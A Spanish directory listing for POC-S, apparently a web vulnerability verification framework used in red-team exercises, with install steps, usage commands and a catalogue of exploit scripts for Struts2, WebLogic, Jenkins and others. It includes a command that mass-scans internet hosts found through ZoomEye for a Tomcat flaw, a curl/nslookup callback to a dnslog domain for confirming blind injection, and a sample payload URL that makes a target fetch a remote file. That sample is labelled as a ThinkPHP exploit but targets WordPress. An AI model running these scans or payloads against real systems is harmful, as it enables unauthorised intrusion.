Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
POC-S — Versión mejorada de POC-T, POC-S, utilizada para verificar rápidamente vulnerabilidades de aplicaciones web en ejercicios de Red vs Blue. Se refuerzan las funcionalidades y se clasifican y agregan scripts, incluye dnslog incorporado, etc. La plataforma complementa con POCs de alta disponibilidad provenientes de máquinas objetivo de vulhub y otros proyectos de código abierto. | Kitploit
Herramientas/GitHubGitHub/jiangsir404/poc-s
ReconocimientoEscáneres de VulnerabilidadesFrameworks de ExploitsRecopilación de InformaciónSeguridad WebFuzzingPruebas de PenetraciónAnálisis de DNS
GitHubjiangsir404/poc-s

POC-S

Ver Repositorio
356646hace 6 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →

Acerca de

Versión mejorada de POC-T, POC-S, utilizada para verificar rápidamente vulnerabilidades de aplicaciones web en ejercicios de Red vs Blue. Se refuerzan las funcionalidades y se clasifican y agregan scripts, incluye dnslog incorporado, etc. La plataforma complementa con POCs de alta disponibilidad provenientes de máquinas objetivo de vulhub y otros proyectos de código abierto.

Compartir

POC-S: Versión reforzada de POC-T

Los documentos wiki de POC-T están en el directorio doc

Prefacio: Actualmente

Aviso legal de exención de responsabilidad

Usar POC-S para atacar objetivos sin el consentimiento previo de ambas partes es ilegal. POC-S se utiliza únicamente con fines de pruebas de seguridad.

Características

  • Compatible con la sintaxis de POC-T
  • Buena clasificación de POCs, método flexible de carga de POCs, compatible con carga de archivo único, por lotes y desde cualquier directorio.
  • Proporciona comandos de terminal pocs/poc-s, separando el framework del POC, permitiendo colocar POCs personalizados en cualquier directorio.
  • Proporciona una plataforma DNS simple, que solo necesita un dominio y una IP pública para funcionar. Se puede usar para verificar rápidamente inyecciones ciegas de comandos y SQL, simple y eficiente.
  • Proporciona buenos scripts de pruebas unitarias.

TODO

  • Recopilar y mejorar POCs basados en máquinas objetivo vulhub y proyectos de código abierto. Consulte mi clasificación de POCs para más detalles.
  • Proporcionar el parámetro --init para actualizar dinámicamente el archivo de configuración tookit.conf, p. ej.: --init zoomeye para inicializar la configuración de ZoomEye.
  • Agregar plataformas dnslog y weblog para verificar rápidamente vulnerabilidades.
  • Agregar dos complementos de verificación: ceye.py y dnslog.py.
  • Agregar pocsapi.py, similar a la funcionalidad de sqlmapapi.
  • Agregar una versión POC-S para Python 3.

Uso

Dado que las interfaces de terceros requieren autenticación, puede inicializar su configuración de interfaz relevante mediante el parámetro --init, ej.: --init zoomeye

root@kitploit:~
pip install pocs

Instalación desde código fuente:

root@kitploit:~
git clone https://github.com/jiangsir404/POC-S.git
mv pocs/toolkit.conf.bak mv pocs/toolkit.conf
python setup.py install

Si al instalar POCS con pip aparece el error 'Some files missing', vaya al directorio de instalación de POCS (por ejemplo, python2.7\Lib\site-packages\pocs) y renombre tookit.conf. Si aparece el error WARNING: Generating metadata for package cachetools produced metadata for project name unknown. Fix your #egg=cachetools fragments., es un problema de dependencias de paquetes. Verifique y actualice las versiones de estos paquetes: setuptools==39.0.1, cachetools==3.1.1, google-api-python-client==1.7.11.

  1. Método de carga de complementos más flexible
root@kitploit:~
pocs -s test/test2.py -iS 127.0.0.1 #加载script/test/test2.py脚本
pocs -s test2 -iS 127.0.0.1 # 加载script/test2.py脚本

pocs -b test -iS 127.0.0.1 # 批量加载/script/test目录下的所有脚本
pocs -b test -s test2.py -iS 127.0.0.1 #加载script/test/test2.py脚本

pocs -s myself_script.py -iS 127.0.0.1 # 加载自定义的脚本和脚本目录
pocs -b mydir -iS 127.0.0.1
  1. Uso de motores de búsqueda
root@kitploit:~
pocs --init zoomeye //初始化zoomeye的配置信息
pocs -b redis -t 50 -aZ "port:6379" --limit 50 -o res.txt
pocs -s test2.py -aZ "ThinkPHP"

Utilice ZoomEye para buscar masivamente la vulnerabilidad CNVD-2020-10487 (Tomcat AJP LFI)

root@kitploit:~
pip install pocs
pocs -b apache -aZ "app:tomcat" --limit 50 -t 30 -o ajp.txt

  1. Uso de la plataforma dnslog

Si todavía está preocupado por la inestabilidad de ceye y no tiene tiempo ni energía para construir una plataforma DNSLog (que requiere dos dominios, una IP pública y la capacidad de modificar los servidores DNS de los dominios), entonces pruebe la plataforma dnslog simple proporcionada por POC-S. Solo necesita un dominio y una IP pública para construirla, y proporciona una interfaz API para la verificación (sin interfaz de usuario).

Suponga que dnslog.xxx.cn es su dominio público y x.x.x.x es la IP pública. Asegúrese de que dnslog.xxx.cn pueda resolverse a x.x.x.x correctamente, de lo contrario no podrá acceder a la API.

Ejecute el comando en la máquina pública (x.x.x.x):

root@kitploit:~
pip install pocs
pocs_dnslog -h 0.0.0.0 -p 88(如果不是pip安装的可以直接运行pocs.dnslog.py脚本)
>>> dns domain: dnslog.xxx.cn
>>> api key: rivir
>>>dns ip: x.x.x.x

El comando de registro DNS solo admite el comando nslookup: nslookup 1234.dnslog.xxx.cn x.x.x.x

Si desea usar el comando ping 1234.dnslog.xxx.cn, también puede configurar servidores de nombres personalizados para el dominio xxx.cn (consulte la configuración de DNSLog).

Comando de registro web: curl http://dnslog.xxx.cn:88/weblog/poc123

Dirección de la API: http://x.x.x.x:88/api/?token={token}&type={dns}&filter=1234.dnslog.xxx.cn Parámetros: - token: Obligatorio, la api_key ingresada al construir dnslog. - type: Obligatorio, valores posibles: dns/web. - filter: Opcional, filtra registros (coincidencia exacta).

POC

POCS proporciona una forma más flexible de clasificar los complementos. Actualmente, se han recopilado cuatro categorías de POCs: Fuzz POC, OWASP POC, Vuln POC, Tool POC. En cuanto a los POCs, se recopilarán algunos existentes en GitHub, pero no demasiados; aún se requiere que los usuarios los recopilen y organicen por sí mismos. f

La redacción de POCs se hará lo más estandarizada posible, siguiendo el estilo de POC-T. Ejemplo a continuación:

root@kitploit:~
#!/usr/bin/env python		
#coding:utf-8

"""
ThinkPHP5 <=5.0.22/<=5.1.29 远程代码执行漏洞

Desc
    2018年12月10日中午,thinkphp官方公众号发布了一个更新通知,包含了一个5.x系列所有版本存在被getshell的高风险漏洞。
    由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,
    受影响的版本包括5.0.23和5.1.31之前的所有版本,推荐尽快更新到最新版本。
Version
	ThinkPHP5.0 版本 <= 5.0.22 ThinkPHP5.1 版本 <= 5.1.29
Usage:
	1. python POC-S.py -s 
	2. POC: /wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://lj.s7star.cn/info.txt
Referer
	https://www.seebug.org/vuldb/ssvid-9771
"""

import requests

def poc(url):
    pass

Vuln POC

Provienen principalmente de la escritura de complementos de vulhub y de los complementos POC propios de POC-T. Solo se agregan algunos POCs de alta disponibilidad. Cada POC listado a continuación ha sido verificado individualmente en un entorno configurado. Si hay algún POC incorrecto, por favor, cree un issue para contactarme.

  • struts2
    • s2-005.py
    • s2-015.py
    • s2-016.py
    • s2-032.py
    • s2-045.py
    • s2-052.py
    • s2-053.py
    • s2-057.py
    • struts2-devmode.py
  • weblogic
    • weblogic-ssrf-netmap.py cve-2014-4210
    • weblogc-cve-2017-10271.py (CVE-2017-10271)
    • weblogic-cve-2018-2628.py
    • weblogic-cve-2019-2725.py
    • weblogic-cve-2019-2729.py

Fuzz POC

Fuente: boy-hack/POC-T

  • bakfile: Detección de archivos de respaldo
  • crossdomain: crossdomain
  • dzxss
  • gitleak
  • issparse
  • ms15-034
  • phpinfo
  • phpmyadmin
  • svnleak
  • swf
  • tomcat_xmlleak
  • wordspace

OWASP POC

Fuente: Scripts de detección de Hunter.

  • cmd_exec
  • sql_injection
  • xss
  • xxe
  • csrf
  • jsonp_xss
  • jsonp_hijacking
  • file_read
  • ssti
  • ssrf

Tool Poc

Algunos POCs de herramientas comunes que proporcionan funciones de motores de búsqueda y consulta de información.

  • bing-dork: Búsqueda en Bing
  • bingc: Resolución inversa de IP a dominio basada en Bing, y dominios de segmento C
  • google-dork: Búsqueda en Google
  • cdn-detect: Detección de CDN
  • waf: Detecta WAF y devuelve URLs sin WAF
  • craw: Extrae direcciones relevantes de enlaces
  • vulscan: Detecta vulnerabilidades de inyección SQL
  • portscan: Escaneo de puertos, detecta servicios con contraseñas débiles
  • domain2ip: Consulta de IP de dominio
  • whois: Consulta de información Whois
  • icp: Consulta de ICP

Otros POCs de código abierto, como el proyecto https://github.com/boy-hack/airbug, recopilan algunos POCs que se pueden usar directamente. Pero hay una biblioteca HackRequests que es para Python 3, necesita ser modificada a Python 2. Puede instalar directamente mi biblioteca modificada para Python 2: https://github.com/jiangsir404/hack-requests

Descargar herramienta
  • weblogic-cve-2020-2551.py
  • weblogic-upload-getshell.py (CVE-2018-2894)
  • thinkphp
    • 5-rce
    • 5.0.23-rce
  • Jenkins
    • jenkins-cve-2015-8103.py
    • jenkins-cve-2017-1000353.py
    • jenkins-cve-2018-1000861.py
  • weakpass
    • mysql
    • redis
    • mongo
    • sqlserver
    • ftp
    • telent
    • web弱口令(通用无验证码后台)
    • http-basic-auth
    • coremail
    • jboss
    • jenkins
    • weblogic
  • unauth
    • redis-unauth.py
    • mongodb-unauth.py
    • memcached-unauth.py
    • elasticsearch-unauth.py
    • kubernetes-unauth.py
    • jenkins-unauth.py
    • docker-unauth-rce.py
    • hadoop-unauth.py
  • apache
    • CNVD-2020-10487 tomcat-ajp-lfi.py
    • tomcat-upload.py
    • tomcat-weak-pass.py
  • Citrix
    • cve-2019-19781
  • supervisor
    • supervisord-RCE-CVE-2017-11610.py
  • Jboss
    • jboss-rce.py
    • CVE-2017-12149
    • CVE-2013-4810
  • spring
    • spring-oauth2-rce.py
    • cve-2018-1273
  • phpmyadmin
    • phpmyadmin-auth-rce.py
    • phpmyadmin4.8.1-RFI.py
  • kibana
    • cve-2019-7609
    • cve-2018-17246
  • php
    • fpm-rce.py
    • CVE-2019-11043
    • CVE-2018-19518
  • discuz
    • x3.4-arbitrary-file-deletion
  • zabbix
    • zabbix-jsrpc-mysql-exp.py
    • zabbix-jsrpc-sqli.py
    • zabbix-weakpass.py
    • zabbix_latest_sqli.py
  • dns-zone-transfer
  • confluence
    • confulence-traversal.py
    • Vulnerabilidad de path traversal y ejecución de comandos de Confluence